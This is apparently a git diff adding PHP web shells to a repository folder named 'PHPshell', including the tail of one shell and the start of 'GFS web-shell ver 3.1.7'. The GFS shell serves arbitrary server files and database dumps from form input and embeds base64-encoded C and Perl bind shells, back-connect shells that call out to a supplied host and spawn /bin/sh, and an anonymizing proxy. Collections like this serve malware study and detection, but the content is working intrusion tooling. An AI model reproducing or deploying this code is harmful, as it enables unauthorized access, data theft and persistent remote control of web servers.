+"JCVy2tfMkIN5OYE0L/OS0ZuKG8knKQDT6yT8eQABe8kGFuv1knOeIY4mvmShnybsne8lXEilbyQY". +"f8g5UJp5kkOXe8lbkxxxLg9fWSm/e8kG8eJy6t61ksdtDeSpxAkODr3koZ51Z9O8kGnkagN5Jxyg". +"9byUX73kqOB1vJBQl8XBr5kpO3W8lhyOr3kmJ7695IN3ECj+XkgY+13vJWxzGxn6eslHcW1p5kg3". +"HIir3ksy5zkdbyWDKoreSCADQv8AOSBssgRrXzJKC9HvJYToXvJNjlV3vJAbqs9fMkJfy+7W8kIN". +"5BtLPeSMPN5Izy9TXzJbg563kgnka0N5LRmSQHvJNl7Sz3kkGTHW8kHTy4ZYiuT/ADkucEvreSuf". +"8jeGP1kkOVdbyQU4ssgA1X7yXPmfca3kuri5RjiQTV/WS5+TJ8nBp5kgmS3W8loJPW8kwyB63kmx". +"yGNXvJApyo33kjfUVvJWzO7HdoK/GqiD3vJAEFv1kgZ0b7yXTjyDYzjT1kpbwBrXzJACoYm8kcjY". +"ZMDeSOM7tTTzJbyjHEit5IJ5Gmt5JsMhiam8kZZgdbySb3qDeSBt2O93p5khJ11vJCB8uQEu95IH". +"K1B9ZIzGzrTzJKM2IL3kgw51qbyTZ9jeSCXOtPMlmWTChvJBozb+MkmRrreSbHkHU3kseut5IOr/". +"AByAKm8lLMsSQbyWYEHreSUcrn9ZIDcDqW+ck4yx9byWbu95Jg3reSDCCQ708ySu3W8lXPNsaGnm". +"S5xyepvJBfHEbO/mSk3td7yTa47hleSXHIka08yQHGcnobyW8m5wcjeSbHMBq3kt5Mjk3T5yQSyJ". +"P8ZJ8GBd7yQdNbyWYgks7jzJAbxud7yQl9rs95IQPyA0BN5KenW8lXk5NzMdKayUhm9AbyQBypre". +"Sw5uNbyWkt1vJA7m8kGP3vJG7veSYZd6eZIJrreSBRkRV7yRjlXW8lXjALv9ZJMvaTWg7yQZln0e". +"8lozINTeSXd3vJM/w8kD5Znb+slHd3vJdBOO0jQ+ZKIHqbyQaOUtte8kwy9rPeSMdur18yT45A4d". 
+"/MkGcf8AM/X1kn5+bEttN5KfQl6eZJMyKAGnmSDTyd7yW4cjn9ZJMqdbyTcZ73kg1qt18yQm/IHd". +"7yQgzLIavr3kkNKg3km5CMdDeSXHMk63kgN/V7yTFmBB17ySZmut5IORYVvJA+BHU3kkyzrreSMM". +"u95Jz8VkgfibIO95JMg2RreSfiJqx07yU8+Ri5NfMkAcgOt5KgzB0N5Ln3P1vJbubreSDpzwYO95". +"KDtV7yTfnLN95LH7695IKBzj/up5kkFA73knx5iAB95JTmWp9ZIDfqH17yUn73krAghnr5kt5Msc". +"urHzJBHcepvJNhk51vJaR3vJGPIMTreSAY7tr3khDl9z18yQgzIsKm8kmJcs95J+XMZMxvJLiSC7". +"3kgCW63ktOb0+8kHNyS95LciWDG8kGA97yWDMuz3kgZd7yT6dbyQNhltBL08yU+XJ8nfXvJUxzAB". +"B+slPkz3VfXvJAm7veSbd3vJYC/W8k7j1vJBhyG3WvmS05UFbyQzhwbyWP0e8kFN4Ad3PnT/AOkn". +"5faz3kr45DbqNPWSmcBt3PeSDOPIUreStysQP9ZLlxJ9aeZKuZ29aeZIDIBtbyS7gOt5JDmT1vJO". +"MgRreSBfy/DyQl6s95IQV5d1H/clG743IQgT3dP3Kvu+NyEIEx3fG5GX5H/uQhA2O7/l+5FXpp/U". +"hCBMn6fuW4bvjchCBzvamn9SQbuv7kIQWDtRnb/son8jV0/qQhBuO7b/AHIz/J1/chCBDu+Ny3Dc". +"/wDchCA97/3IQhB//9k=", +"pdisk"=> +"R0lGODlhEQAMAOZkAODg34mJicfHx4GBguHh4WxsbObm5dDQ0H5+fnl5eYKCgv3+//Ly8t/f3svK". +"yqKios/PzsDAwKempktKS87NzaCgoE5OTnFyco2NjLu7u1JRVvf4+Pv+/4CAgMHAv9LS0mVldFdX". +"V0VFSsTDw7i4uXZ2dqSjpKWkpNzb24uLkMzM3efn5uzr60NDRoSEjmhnZ6usq+Tk49HR0HJyco6O". +"jlNTW3Z2hNjY2MHBwfHw8Dw8P9XV1KOjpNnZ2MvLytzc24mJjXh4ipeXl2JjY5STk25vdYqKiamp". +"qV1dXunp7Gxsa52cnHl5fZiYtrq6u9TU1ExMTq+vrvb3+FNTU+7t7srJyTQ0NO3s7Ozs63t8fE5N". +"Urq5unBwdZqamujn54CAktbV1X18fbW1tdTU0wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAGQALAAAAAARAAwAAAeLgGSCg4SFhoeIZCwoAmArFDtPC4UxABkJBSQMC1cAGw44PoNOYw0C". +"BAAMHFgNUkkqKUBeZBVLYqcGBzcfI11MLV82CGQSUUIKJlsyNJgDQ1ZNQUpkOQEBVTwdCmEWFwhF". +"IBpTWYMeAyUYJ1w6IjVQITNHP4RUEEQvLloTSAERBok9YBh5cCCRQUKBAAA7", +"odel"=> +"R0lGODlhEQAPAKIEAFQhHFQhG1MhG5QaHQAAAAAAAAAAAAAAACH5BAEAAAQALAAAAAARAA8AAAMq". 
+"SLrc/jDKIZoYb+iqgsbOVwFf9JGaRHypilLqxQaRl4rPu+AhuPuqYDABADs="
+
+);
+$imgequals = array(
+"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml"),
+"ext_htaccess"=>array("ext_htaccess","ext_htpasswd")
+);
+ ksort($arrimg);
+ if (!$getall)
+ {
+ header("Content-type: image/gif");
+ header("Cache-control: public");
+ header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+ header("Cache-control: max-age=".(60*60*24*7));
+ header("Last-Modified: ".date("r",filemtime(__FILE__)));
+ foreach($imgequals as $k=>$v)
+ {
+if (in_array($img,$v)) {$img = $k;}
+ }
+ if (empty($arrimg[$img])) {$img = "small_unk";}
+ if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+ echo base64_decode($arrimg[$img]);
+ }
+ else
+ {
+ echo "<center>";
+ $k = array_keys($arrimg);
+ foreach ($k as $u)
+ {
+echo $u.":<img src=\"".$sul."act=img&img=".$u."\" border=\"1\"><br>";
+ }
+ echo "</center>";
+ }
+ exit;
+}
+if ($act == "about")
+{
+ $dàta = "Any stupid copyrights and copylefts";
+ echo $data;
+}
+
+$microtime = round(getmicrotime()-$starttime,4);
+
+?>
+<? // [CT] TEAM SCRIPTING - RODNOC ?>
\ No newline at end of file
diff --git a/php/PHPshell/gfs_sh/gfs_sh.jpg b/php/PHPshell/gfs_sh/gfs_sh.jpg
new file mode 100644
index 0000000..a8a32f2
Binary files /dev/null and b/php/PHPshell/gfs_sh/gfs_sh.jpg differ
diff --git a/php/PHPshell/gfs_sh/gfs_sh.php b/php/PHPshell/gfs_sh/gfs_sh.php
new file mode 100644
index 0000000..dd6c601
--- /dev/null
+++ b/php/PHPshell/gfs_sh/gfs_sh.php
@@ -0,0 +1,1575 @@
+<?
+/*
+*************************
+* ###### ##### ###### *
+* ###### ##### ###### *
+* ## ## ## *
+* ## #### ###### *
+* ## ## #### ###### *
+* ## ## ## ## *
+* ###### ## ###### *
+* ###### ## ###### *
+* *
+* Group Freedom Search! *
+*************************
+GFS Web-Shell
+*/
+error_reporting(0);
+if($_POST['b_down']){
+ $file=fopen($_POST['fname'],"r");
+ ob_clean();
+ $filename=basename($_POST['fname']);
+ $filedump=fread($file,filesize($_POST['fname']));
+ fclose($file);
+ header("Content-type: application/octet-stream");
+ header("Content-disposition: attachment; filename=\"".$filename."\";");
+ echo $filedump;
+ exit();
+}
+if($_POST['b_dtable']){
+ $dump=down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ if($dump!=""){
+ header("Content-type: application/octet-stream");
+ header("Content-disposition: attachment; filename=\"".$_POST['tablename'].".dmp\";");
+ echo down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ exit();
+ }else
+ die("<b>Error dump!</b><br> table=".$_POST['tablename']."<br> db=".$_POST['dbname']."<br> host=".$_POST['host']."<br> user=".$_POST['username']."<br> pass=".$_POST['pass']);
+}
+set_magic_quotes_runtime(0);
+set_time_limit(0);
+ini_set('max_execution_time',0);
+ini_set('output_buffering',0);
+if(version_compare(phpversion(), '4.1.0')==-1){
+ $_POST=&$HTTP_POST_VARS;
+ $_GET=&$HTTP_GET_VARS;
+ $_SERVER=&$HTTP_SERVER_VARS;
+}
+if (get_magic_quotes_gpc()){
+ foreach ($_POST as $k=>$v){
+ $_POST[$k]=stripslashes($v);
+ }
+ foreach ($_SERVER as $k=>$v){
+ $_SERVER[$k]=stripslashes($v);
+ }
+}
+if ($_POST['username']==""){
+ $_POST['username']="root";
+}
+////////////////////////////////////////////////////////////////////////////////
+///////////////////////////// دهًهىهييûه ///////////////////////////////////////
+////////////////////////////////////////////////////////////////////////////////
+$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE']; +$r_act=$_POST['r_act']; +$safe_mode=ini_get('safe_mode'); //ٌٍàٌٍَ لهçîïàٌيîمî ًهوèىà +$mysql_stat=function_exists('mysql_connect'); //حàëè÷èه mysql +$curl_on=function_exists('curl_version'); //يàëè÷èه cURL +$dis_func=ini_get('disable_functions'); //çàلëîêèًîâàيûه ôَيêِèè +$HTML=<<<html +<html> +<head> +<title>GFS web-shell ver 3.1.7</title> +</head> +<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0> +html; +$port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; 
+$port_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd 
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$prx1="IyEvaG9tZS9tZXJseW4vYmluL3BlcmwgLXcNCiMjIw0KIyMjaHR0cDovL2ZvcnVtLndlYi1oYWNrLnJ1L2luZGV4LnBocD9zaG93dG9waWM9 +MjY3MDYmc3Q9MCYjZW50cnkyNDYzNDQNCiMjIw0KDQp1c2Ugc3RyaWN0Ow0KJEVOVntQQVRIfSA9IGpvaW4gXCI6XCIsIHF3KC91c3IvdWNiIC9iaW4 +gL3Vzci9iaW4pOw0KJHwrKzsNCg0KIyMgQ29weXJpZ2h0IChjKSAxOTk2IGJ5IFJhbmRhbCBMLiBTY2h3YXJ0eg0KIyMgVGhpcyBwcm9ncmFtIGlzIG +ZyZWUgc29mdHdhcmU7IHlvdSBjYW4gcmVkaXN0cmlidXRlIGl0DQojIyBhbmQvb3IgbW9kaWZ5IGl0IHVuZGVyIHRoZSBzYW1lIHRlcm1zIGFzIFBlc +mwgaXRzZWxmLg0KDQojIyBBbm9ueW1vdXMgSFRUUCBwcm94eSAoaGFuZGxlcyBodHRwOiwgZ29waGVyOiwgZnRwOikNCiMjIHJlcXVpcmVzIExXUCA1 +LjA0IG9yIGxhdGVyDQoNCm15ICRIT1NUID0gXCJsb2NhbGhvc3RcIjsNCm15ICRQT1JUID0gXCI="; +$prx2="XCI7DQoNCnN1YiBwcmVmaXggew0KIG15ICRub3cgPSBsb2NhbHRpbWU7DQoNCiBqb2luIFwiXCIsIG1hcCB7IFwiWyRub3ddIFskeyR9XSAk +X1xcblwiIH0gc3BsaXQgL1xcbi8sIGpvaW4gXCJcIiwgQF87DQp9DQoNCiRTSUd7X19XQVJOX199ID0gc3ViIHsgd2FybiBwcmVmaXggQF8gfTsNCiR +TSUd7X19ESUVfX30gPSBzdWIgeyBkaWUgcHJlZml4IEBfIH07DQokU0lHe0NMRH0gPSAkU0lHe0NITER9ID0gc3ViIHsgd2FpdDsgfTsNCg0KbXkgJE +FHRU5UOyAgICMgZ2xvYmFsIHVzZXIgYWdlbnQgKGZvciBlZmZpY2llbmN5KQ0KQkVHSU4gew0KIHVzZSBMV1A6OlVzZXJBZ2VudDsNCg0KIEBNeUFnZ +W50OjpJU0EgPSBxdyhMV1A6OlVzZXJBZ2VudCk7ICMgc2V0IGluaGVyaXRhbmNlDQoNCiAkQUdFTlQgPSBNeUFnZW50LT5uZXc7DQogJEFHRU5ULT5h +Z2VudChcImFub24vMC4wN1wiKTsNCiAkQUdFTlQtPmVudl9wcm94eTsNCn0NCg0Kc3ViIE15QWdlbnQ6OnJlZGlyZWN0X29rIHsgMCB9ICMgcmVkaXJ 
+lY3RzIHNob3VsZCBwYXNzIHRocm91Z2gNCg0KeyAgICAjIyMgTUFJTiAjIyMNCiB1c2UgSFRUUDo6RGFlbW9uOw0KDQogbXkgJG1hc3RlciA9IG5ldy +BIVFRQOjpEYWVtb24NCiAgIExvY2FsQWRkciA9PiAkSE9TVCwgTG9jYWxQb3J0ID0+ICRQT1JUOw0KIHdhcm4gXCJzZXQgeW91ciBwcm94eSB0byA8V +VJMOlwiLCAkbWFzdGVyLT51cmwsIFwiPlwiOw0KIG15ICRzbGF2ZTsNCiAmaGFuZGxlX2Nvbm5lY3Rpb24oJHNsYXZlKSB3aGlsZSAkc2xhdmUgPSAk +bWFzdGVyLT5hY2NlcHQ7DQogZXhpdCAwOw0KfSAgICAjIyMgRU5EIE1BSU4gIyMjDQoNCnN1YiBoYW5kbGVfY29ubmVjdGlvbiB7DQogbXkgJGNvbm5 +lY3Rpb24gPSBzaGlmdDsgIyBIVFRQOjpEYWVtb246OkNsaWVudENvbm4NCg0KIG15ICRwaWQgPSBmb3JrOw0KIGlmICgkcGlkKSB7ICAgIyBzcGF3bi +BPSywgYW5kIElcJ20gdGhlIHBhcmVudA0KICAgY2xvc2UgJGNvbm5lY3Rpb247DQogICByZXR1cm47DQogfQ0KICMjIHNwYXduIGZhaWxlZCwgb3IgS +VwnbSBhIGdvb2QgY2hpbGQNCiBteSAkcmVxdWVzdCA9ICRjb25uZWN0aW9uLT5nZXRfcmVxdWVzdDsNCiBpZiAoZGVmaW5lZCgkcmVxdWVzdCkpIHsN +CiAgIG15ICRyZXNwb25zZSA9ICZmZXRjaF9yZXF1ZXN0KCRyZXF1ZXN0KTsNCiAgICRjb25uZWN0aW9uLT5zZW5kX3Jlc3BvbnNlKCRyZXNwb25zZSk +7DQogICBjbG9zZSAkY29ubmVjdGlvbjsNCiB9DQogZXhpdCAwIGlmIGRlZmluZWQgJHBpZDsgIyBleGl0IGlmIElcJ20gYSBnb29kIGNoaWxkIHdpdG +ggYSBnb29kIHBhcmVudA0KfQ0KDQpzdWIgZmV0Y2hfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgICMgSFRUUDo6UmVxdWVzdA0KDQogd +XNlIEhUVFA6OlJlc3BvbnNlOw0KDQogbXkgJHVybCA9ICRyZXF1ZXN0LT51cmw7DQogd2FybiBcImZldGNoaW5nICR1cmxcIjsNCiBpZiAoJHVybC0+ +c2NoZW1lICF+IC9eKGh0dHB8Z29waGVyfGZ0cCkkLykgew0KICAgbXkgJHJlcyA9IEhUVFA6OlJlc3BvbnNlLT5uZXcoNDAzLCBcIkZvcmJpZGRlblw +iKTsNCiAgICRyZXMtPmNvbnRlbnQoXCJiYWQgc2NoZW1lOiBAe1skdXJsLT5zY2hlbWVdfVxcblwiKTsNCiAgICRyZXM7DQogfSBlbHNpZiAobm90IC +R1cmwtPnJlbC0+bmV0bG9jKSB7DQogICBteSAkcmVzID0gSFRUUDo6UmVzcG9uc2UtPm5ldyg0MDMsIFwiRm9yYmlkZGVuXCIpOw0KICAgJHJlcy0+Y +29udGVudChcInJlbGF0aXZlIFVSTCBub3QgcGVybWl0dGVkXFxuXCIpOw0KICAgJHJlczsNCiB9IGVsc2Ugew0KICAgJmZldGNoX3ZhbGlkYXRlZF9y +ZXF1ZXN0KCRyZXF1ZXN0KTsNCiB9DQp9DQoNCnN1YiBmZXRjaF92YWxpZGF0ZWRfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgIyBIVFR +QOjpSZXF1ZXN0DQoNCiAjIyB1c2VzIGdsb2JhbCAkQUdFTlQNCg0KICMjIHdhcm4gXCJvcmlnIHJlcXVlc3Q6IDw8PFwiLCAkcmVxdWVzdC0+aGVhZG 
+Vyc19hc19zdHJpbmcsIFwiPj4+XCI7DQogJHJlcXVlc3QtPnJlbW92ZV9oZWFkZXIocXcoVXNlci1BZ2VudCBGcm9tIFJlZmVyZXIgQ29va2llKSk7D +QogIyMgd2FybiBcImFub24gcmVxdWVzdDogPDw8XCIsICRyZXF1ZXN0LT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiBteSAkcmVzcG9uc2Ug +PSAkQUdFTlQtPnJlcXVlc3QoJHJlcXVlc3QpOw0KICMjIHdhcm4gXCJvcmlnIHJlc3BvbnNlOiA8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N +0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2UtPnJlbW92ZV9oZWFkZXIocXcoU2V0LUNvb2tpZSkpOw0KICMjIHdhcm4gXCJhbm9uIHJlc3BvbnNlOi +A8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2U7DQp9"; +$port[1] = "tcpmux (TCP Port Service Multiplexer)"; +$port[2] = "Management Utility"; +$port[3] = "Compression Process"; +$port[5] = "rje (Remote Job Entry)"; +$port[7] = "echo"; +$port[9] = "discard"; +$port[11] = "systat"; +$port[13] = "daytime"; +$port[15] = "netstat"; +$port[17] = "quote of the day"; +$port[18] = "send/rwp"; +$port[19] = "character generator"; +$port[20] = "ftp-data"; +$port[21] = "ftp"; +$port[22] = "ssh, pcAnywhere"; +$port[23] = "Telnet"; +$port[25] = "SMTP (Simple Mail Transfer)"; +$port[27] = "ETRN (NSW User System FE)"; +$port[29] = "MSG ICP"; +$port[31] = "MSG Authentication"; +$port[33] = "dsp (Display Support Protocol)"; +$port[37] = "time"; +$port[38] = "RAP (Route Access Protocol)"; +$port[39] = "rlp (Resource Location Protocol)"; +$port[41] = "Graphics"; +$port[42] = "nameserv, WINS"; +$port[43] = "whois, nickname"; +$port[44] = "MPM FLAGS Protocol"; +$port[45] = "Message Processing Module [recv]"; +$port[46] = "MPM [default send]"; +$port[47] = "NI FTP"; +$port[48] = "Digital Audit Daemon"; +$port[49] = "TACACS, Login Host Protocol"; +$port[50] = "RMCP, re-mail-ck"; +$port[53] = "DNS"; +$port[57] = "MTP (any private terminal access)"; +$port[59] = "NFILE"; +$port[60] = "Unassigned"; +$port[61] = "NI MAIL"; +$port[62] = "ACA Services"; +$port[63] = "whois++"; +$port[64] = "Communications Integrator (CI)"; +$port[65] = "TACACS-Database Service"; +$port[66] = "Oracle SQL*NET"; +$port[67] = 
"bootps (Bootstrap Protocol Server)"; +$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)"; +$port[69] = "Trivial File Transfer Protocol (tftp)"; +$port[70] = "Gopher"; +$port[71] = "Remote Job Service"; +$port[72] = "Remote Job Service"; +$port[73] = "Remote Job Service"; +$port[74] = "Remote Job Service"; +$port[75] = "any private dial out service"; +$port[76] = "Distributed External Object Store"; +$port[77] = "any private RJE service"; +$port[78] = "vettcp"; +$port[79] = "finger"; +$port[80] = "World Wide Web HTTP"; +$port[81] = "HOSTS2 Name Serve"; +$port[82] = "XFER Utility"; +$port[83] = "MIT ML Device"; +$port[84] = "Common Trace Facility"; +$port[85] = "MIT ML Device"; +$port[86] = "Micro Focus Cobol"; +$port[87] = "any private terminal link"; +$port[88] = "Kerberos, WWW"; +$port[89] = "SU/MIT Telnet Gateway"; +$port[90] = "DNSIX Securit Attribute Token Map"; +$port[91] = "MIT Dover Spooler"; +$port[92] = "Network Printing Protocol"; +$port[93] = "Device Control Protocol"; +$port[94] = "Tivoli Object Dispatcher"; +$port[95] = "supdup"; +$port[96] = "DIXIE"; +$port[98] = "linuxconf"; +$port[99] = "Metagram Relay"; +$port[100] = "[unauthorized use]"; +$port[101] = "HOSTNAME"; +$port[102] = "ISO, X.400, ITOT"; +$port[103] = "Genesis Point-to-Point"; +$port[104] = "ACR-NEMA Digital Imag. & Comm. 
300"; +$port[105] = "CCSO name server protocol"; +$port[106] = "poppassd"; +$port[107] = "Remote Telnet Service"; +$port[108] = "SNA Gateway Access Server"; +$port[109] = "POP2"; +$port[110] = "POP3"; +$port[111] = "Sun RPC Portmapper"; +$port[112] = "McIDAS Data Transmission Protocol"; +$port[113] = "Authentication Service"; +$port[115] = "sftp (Simple File Transfer Protocol)"; +$port[116] = "ANSA REX Notify"; +$port[117] = "UUCP Path Service"; +$port[118] = "SQL Services"; +$port[119] = "NNTP"; +$port[120] = "CFDP"; +$port[123] = "NTP"; +$port[124] = "SecureID"; +$port[129] = "PWDGEN"; +$port[133] = "statsrv"; +$port[135] = "loc-srv/epmap"; +$port[137] = "netbios-ns"; +$port[138] = "netbios-dgm (UDP)"; +$port[139] = "NetBIOS"; +$port[143] = "IMAP"; +$port[144] = "NewS"; +$port[150] = "SQL-NET"; +$port[152] = "BFTP"; +$port[153] = "SGMP"; +$port[156] = "SQL Service"; +$port[161] = "SNMP"; +$port[175] = "vmnet"; +$port[177] = "XDMCP"; +$port[178] = "NextStep Window Server"; +$port[179] = "BGP"; +$port[180] = "SLmail admin"; +$port[199] = "smux"; +$port[210] = "Z39.50"; +$port[213] = "IPX"; +$port[218] = "MPP"; +$port[220] = "IMAP3"; +$port[256] = "RAP"; +$port[257] = "Secure Electronic Transaction"; +$port[258] = "Yak Winsock Personal Chat"; +$port[259] = "ESRO"; +$port[264] = "FW1_topo"; +$port[311] = "Apple WebAdmin"; +$port[350] = "MATIP type A"; +$port[351] = "MATIP type B"; +$port[363] = "RSVP tunnel"; +$port[366] = "ODMR (On-Demand Mail Relay)"; +$port[371] = "Clearcase"; +$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)"; +$port[389] = "LDAP"; +$port[407] = "Timbuktu"; +$port[427] = "Server Location"; +$port[434] = "Mobile IP"; +$port[443] = "ssl"; +$port[444] = "snpp, Simple Network Paging Protocol"; +$port[445] = "SMB"; +$port[458] = "QuickTime TV/Conferencing"; 